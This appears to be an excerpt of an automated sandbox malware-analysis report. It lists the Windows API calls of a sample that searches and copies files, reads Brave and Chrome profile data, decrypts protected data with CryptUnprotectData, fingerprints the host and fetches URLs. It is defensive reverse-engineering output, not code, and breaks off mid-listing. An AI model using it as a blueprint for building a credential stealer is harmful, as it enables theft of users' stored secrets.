                                                                                                      • StrCmpCA.SHLWAPI(?,0041D7F8), ref: 004116E4
                                                                                                      • StrCmpCA.SHLWAPI(?,0041D7FC), ref: 004116FA
                                                                                                      • FindNextFileA.KERNELBASE(000000FF,?), ref: 00411980
                                                                                                      • FindClose.KERNEL32(000000FF), ref: 00411995
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2882938021.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000448000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2882938021.000000000044B000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000624000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000636000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_pYJeC4VJbw.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                                                                                                      • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                                                                                                      • API String ID: 1125553467-2524465048
                                                                                                      • Opcode ID: 1c5a19b8d0364035e361803f1f2d8b881592936573ce4df1f42e7415625cdfa2
                                                                                                      • Instruction ID: 56f1237c2d7c520c90c98f1ce5fb3a6d9b51b415e2d0c2f733ce4a2014328567
                                                                                                      • Opcode Fuzzy Hash: 1c5a19b8d0364035e361803f1f2d8b881592936573ce4df1f42e7415625cdfa2
                                                                                                      • Instruction Fuzzy Hash: AE9172B19006189BDB24EFA4DC85FEA737DBF88300F044589F61A92191DB789AC5CFA5
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                        • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                        • Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
                                                                                                        • Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82
                                                                                                        • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                        • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                        • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                        • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                      • FindFirstFileA.KERNEL32(00000000,?,0041D71A,0041D717,00000000,?,?,?,0041DB54,0041D716), ref: 0040B695
                                                                                                      • StrCmpCA.SHLWAPI(?,0041DB58), ref: 0040B6ED
                                                                                                      • StrCmpCA.SHLWAPI(?,0041DB5C), ref: 0040B703
                                                                                                      • FindNextFileA.KERNELBASE(000000FF,?), ref: 0040BF3B
                                                                                                      • FindClose.KERNEL32(000000FF), ref: 0040BF4D
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2882938021.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000448000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2882938021.000000000044B000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000624000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000636000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_pYJeC4VJbw.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                                                                                      • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                                                                                                      • API String ID: 3334442632-726946144
                                                                                                      • Opcode ID: 2bea4be879b4c07dc692db0783b781ac6eeba21f1432059b5c9109fef96b76dc
                                                                                                      • Instruction ID: 76d401781d3fce7c968e745dc043d6a6225f477281f2400f678919b217ba5a4c
                                                                                                      • Opcode Fuzzy Hash: 2bea4be879b4c07dc692db0783b781ac6eeba21f1432059b5c9109fef96b76dc
                                                                                                      • Instruction Fuzzy Hash: 0F423572A0010457CF14FB61DC56EEE773DAF84304F41455EF90AA6181EE38AB89CBE9
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00404C8A
                                                                                                      • RtlAllocateHeap.NTDLL(00000000), ref: 00404C91
                                                                                                      • InternetOpenA.WININET(0041D79B,00000000,00000000,00000000,00000000), ref: 00404CAA
                                                                                                      • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00404CD1
                                                                                                      • InternetReadFile.WININET(c.A,?,00000400,00000000), ref: 00404D01
                                                                                                      • InternetCloseHandle.WININET(c.A), ref: 00404D75
                                                                                                      • InternetCloseHandle.WININET(?), ref: 00404D82
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2882938021.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000448000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2882938021.000000000044B000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000624000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000636000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_pYJeC4VJbw.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                                                                                                      • String ID: c.A$c.A
                                                                                                      • API String ID: 3066467675-270182787
                                                                                                      • Opcode ID: fcecdc0113d85318793fd84deb2f89eac7e502c6f555e42ff774b71d9ce7f9e0
                                                                                                      • Instruction ID: 93472a029acc8278824907ab7d145ea178407da7df790c597300061c638fc298
                                                                                                      • Opcode Fuzzy Hash: fcecdc0113d85318793fd84deb2f89eac7e502c6f555e42ff774b71d9ce7f9e0
                                                                                                      • Instruction Fuzzy Hash: 3731F8F4A00218ABDB20DF54DD85BDDB7B5BB88304F5081D9F709A7280DB746AC58F98
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph (graph rendering not recoverable): function entry 4015c0; API calls named in the graph: FindFirstFileA, StrCmpCA, CopyFileA, DeleteFileA, FindNextFileA, FindClose
                                                                                                      APIs
                                                                                                        • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                      • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004215C4,?,00401E03,?,004215C8,?,?,00000000,?,00000000), ref: 00401813
                                                                                                      • StrCmpCA.SHLWAPI(?,004215CC), ref: 00401863
                                                                                                      • StrCmpCA.SHLWAPI(?,004215D0), ref: 00401879
                                                                                                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00401C30
                                                                                                      • DeleteFileA.KERNEL32(00000000), ref: 00401CB4
                                                                                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 00401D0A
                                                                                                      • FindClose.KERNEL32(000000FF), ref: 00401D1C
                                                                                                        • Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
                                                                                                        • Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82
                                                                                                        • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                        • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                        • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                        • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2882938021.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000448000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2882938021.000000000044B000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000624000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000636000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_pYJeC4VJbw.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                                                                                                      • String ID: \*.*
                                                                                                      • API String ID: 1415058207-1173974218
                                                                                                      • Opcode ID: 499d1c06c2026e2338a7c3e8ee12ae88e0e1a5ccf7c85ab042ff8c887cb7d259
                                                                                                      • Instruction ID: 3aa4ae790513c502dab12fd0122e5550b13815c0fff8c800b600eb4522263f51
                                                                                                      • Opcode Fuzzy Hash: 499d1c06c2026e2338a7c3e8ee12ae88e0e1a5ccf7c85ab042ff8c887cb7d259
                                                                                                      • Instruction Fuzzy Hash: D41225759102189BCB15FB61DC56EEE7739AF54308F41419EB10A62091EF38AFC9CFA8
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                        • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                        • Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
                                                                                                        • Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82
                                                                                                        • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                        • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                        • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                        • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                      • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,0041DC10,0041D73F), ref: 0040D22B
                                                                                                      • StrCmpCA.SHLWAPI(?,0041DC14), ref: 0040D273
                                                                                                      • StrCmpCA.SHLWAPI(?,0041DC18), ref: 0040D289
                                                                                                      • FindNextFileA.KERNELBASE(000000FF,?), ref: 0040D4EE
                                                                                                      • FindClose.KERNEL32(000000FF), ref: 0040D500
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2882938021.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000448000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2882938021.000000000044B000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000624000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000636000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_pYJeC4VJbw.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                                                                                      • String ID:
                                                                                                      • API String ID: 3334442632-0
                                                                                                      • Opcode ID: 29f8f4645952d67dce6854253d48bac115f27aa08fd6dc738513443c43b80bf1
                                                                                                      • Instruction ID: a7e743a2a4f5118c59e4eb5b7e6cabc454f6fbff0e67e47d23a58287cf68124a
                                                                                                      • Opcode Fuzzy Hash: 29f8f4645952d67dce6854253d48bac115f27aa08fd6dc738513443c43b80bf1
                                                                                                      • Instruction Fuzzy Hash: 63913B72A0020497CB14FFB1EC569EE777DAB84308F41466EF90A96581EE38D788CBD5
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                        • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                      • GetKeyboardLayoutList.USER32(00000000,00000000,0041D146), ref: 0041459E
                                                                                                      • LocalAlloc.KERNEL32(00000040,?), ref: 004145B6
                                                                                                      • GetKeyboardLayoutList.USER32(?,00000000), ref: 004145CA
                                                                                                      • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 0041461F
                                                                                                      • LocalFree.KERNEL32(00000000), ref: 004146DF
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2882938021.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000448000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2882938021.000000000044B000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000624000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000636000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_pYJeC4VJbw.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                                                                                                      • String ID: /
                                                                                                      • API String ID: 3090951853-4001269591
                                                                                                      • Opcode ID: a1db220857ba2c5b91b5bb2b77c55690ff585134261d2f0361b5e5f31dc33725
                                                                                                      • Instruction ID: e4a09482d03fe0ac07b2aa12fe49ef9b635f824a972481fa3f662a7a2871ed61
                                                                                                      • Opcode Fuzzy Hash: a1db220857ba2c5b91b5bb2b77c55690ff585134261d2f0361b5e5f31dc33725
                                                                                                      • Instruction Fuzzy Hash: D5413B74940218ABCB24DF50DC89BEDB775BB54308F2042DAE10A66191DB786FC5CF54
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                        • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                        • Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
                                                                                                        • Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82
                                                                                                        • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                        • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                        • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                        • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                      • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,0041D74E), ref: 0040DBD2
                                                                                                      • StrCmpCA.SHLWAPI(?,0041DC58), ref: 0040DC22
                                                                                                      • StrCmpCA.SHLWAPI(?,0041DC5C), ref: 0040DC38
                                                                                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 0040E306
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2882938021.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000448000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2882938021.000000000044B000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000624000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000636000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_pYJeC4VJbw.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                                                                                                      • String ID: \*.*
                                                                                                      • API String ID: 433455689-1173974218
                                                                                                      • Opcode ID: beeb6b8bc2ff9e49012fe50a97a9a25f54ee3440c521a047357208b641dc3e01
                                                                                                      • Instruction ID: 8f23b39e961a58df861ec407c7814dc8b58ae9c3eb94c511c30fb23e96a564a4
                                                                                                      • Opcode Fuzzy Hash: beeb6b8bc2ff9e49012fe50a97a9a25f54ee3440c521a047357208b641dc3e01
                                                                                                      • Instruction Fuzzy Hash: 88126771A002145ACB14FB61DC56EED7739AF54308F4142AEB50A66091EF389FC8CFE8
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                        • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00414E07
                                                                                                      • Process32First.KERNEL32(00000000,00000128), ref: 00414E1B
                                                                                                      • Process32Next.KERNEL32(00000000,00000128), ref: 00414E30
                                                                                                        • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                        • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                        • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                        • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00414E9E
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2882938021.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000448000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2882938021.000000000044B000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000624000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000636000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_pYJeC4VJbw.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                                                                                                      • String ID:
                                                                                                      • API String ID: 1066202413-0
                                                                                                      • Opcode ID: 843c6556a2d21126533c8f143eda47aec1184c8e5a4ac15968d741abdee82b8b
                                                                                                      • Instruction ID: b51d58226d22fc07b4aaea4bdcaba1b12d12dab42e387443cd86e66b2ce9f1c4
                                                                                                      • Opcode Fuzzy Hash: 843c6556a2d21126533c8f143eda47aec1184c8e5a4ac15968d741abdee82b8b
                                                                                                      • Instruction Fuzzy Hash: ED211D759002189BCB24EB61DC95FDEB779AF54304F1041DAA50A66190DF38AFC5CF94
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?,02DD80E0,00000000,?,0041D758,00000000,?,00000000,00000000,?,02DD8BC0,00000000), ref: 004144C0
                                                                                                      • HeapAlloc.KERNEL32(00000000), ref: 004144C7
                                                                                                      • GetTimeZoneInformation.KERNEL32(?), ref: 004144DA
                                                                                                      • wsprintfA.USER32 ref: 00414514
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2882938021.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000448000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2882938021.000000000044B000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000624000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000636000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_pYJeC4VJbw.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Heap$AllocInformationProcessTimeZonewsprintf
                                                                                                      • String ID:
                                                                                                      • API String ID: 362916592-0
                                                                                                      • Opcode ID: 3e8ee039c0baa52381bc867147264b9e0472758f99ecf5fc77eb662dd471fe6c
                                                                                                      • Instruction ID: 63b956e3650aea0bdd01ac085b80a838c67200ff8d98e36f2a49cf33a9f6a1bd
                                                                                                      • Opcode Fuzzy Hash: 3e8ee039c0baa52381bc867147264b9e0472758f99ecf5fc77eb662dd471fe6c
                                                                                                      • Instruction Fuzzy Hash: C7F06770E047289BDB309B64DD49FA9737ABB44311F0002D5EA0AE3291DB749E858F97
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00409564
                                                                                                      • LocalAlloc.KERNEL32(00000040,00000000), ref: 00409583
                                                                                                      • LocalFree.KERNEL32(?), ref: 004095AF
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2882938021.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000448000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2882938021.000000000044B000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000624000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000636000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_pYJeC4VJbw.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Local$AllocCryptDataFreeUnprotect
                                                                                                      • String ID:
                                                                                                      • API String ID: 2068576380-0
                                                                                                      • Opcode ID: 22788d86bb0e3b36a7a96175dcc17964957ca332b329b0ec9e9903d4a9c63904
                                                                                                      • Instruction ID: 845aa5354f8c35be15d3c308e338542aeef751caf2e905b87ee6994bb5fcaacd
                                                                                                      • Opcode Fuzzy Hash: 22788d86bb0e3b36a7a96175dcc17964957ca332b329b0ec9e9903d4a9c63904
                                                                                                      • Instruction Fuzzy Hash: 2B11B7B8A00609EFCB04DF94C984AAEB7B5FF88301F104559E915A7390D774AE51CBA1
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • GetProcessHeap.KERNEL32(00000000,00000104,00401177,02DD51E0,004136EB,0041D6E3), ref: 004143CD
                                                                                                      • HeapAlloc.KERNEL32(00000000), ref: 004143D4
                                                                                                      • GetUserNameA.ADVAPI32(?,00000104), ref: 004143EC
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2882938021.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000448000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2882938021.000000000044B000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000624000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000636000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_pYJeC4VJbw.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Heap$AllocNameProcessUser
                                                                                                      • String ID:
                                                                                                      • API String ID: 1206570057-0
                                                                                                      • Opcode ID: 19f43c5935948d257337b5cfe167422182bb8e9e8b16b88c7073f3e19bcb2857
                                                                                                      • Instruction ID: fd22aaf49eebc4deedfa71bce2fb200d05227bfc9b63873cd8cb515d50d954e6
                                                                                                      • Opcode Fuzzy Hash: 19f43c5935948d257337b5cfe167422182bb8e9e8b16b88c7073f3e19bcb2857
                                                                                                      • Instruction Fuzzy Hash: 2CE08CB490070CFFCB20EFE4DC49E9CBBB8AB08312F000184FA09E3280DB7056848B91
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,004136D7,0041D6E3), ref: 0040112A
                                                                                                      • ExitProcess.KERNEL32 ref: 0040113E
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2882938021.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000448000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2882938021.000000000044B000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000624000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000636000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_pYJeC4VJbw.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: ExitInfoProcessSystem
                                                                                                      • String ID:
                                                                                                      • API String ID: 752954902-0
                                                                                                      • Opcode ID: 0c78e0eb242a3f19764e03ad46aab426447ce2b04c76b8959ffb9729e3075d63
                                                                                                      • Instruction ID: 30efb513975bfe185fa80fb3a8f84b393628ccfbb0aa9170a1b214bc368b0093
                                                                                                      • Opcode Fuzzy Hash: 0c78e0eb242a3f19764e03ad46aab426447ce2b04c76b8959ffb9729e3075d63
                                                                                                      • Instruction Fuzzy Hash: B6D05E7490020C8BCB14DFE09A496DDBBB9AB8D711F001455DD0572240DA305441CA65
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                        • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                        • Part of subcall function 004154E0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 0041550B
                                                                                                        • Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
                                                                                                        • Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82
                                                                                                        • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                        • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                        • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                        • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                        • Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6
                                                                                                        • Part of subcall function 004093A0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004093CC
                                                                                                        • Part of subcall function 004093A0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 004093F1
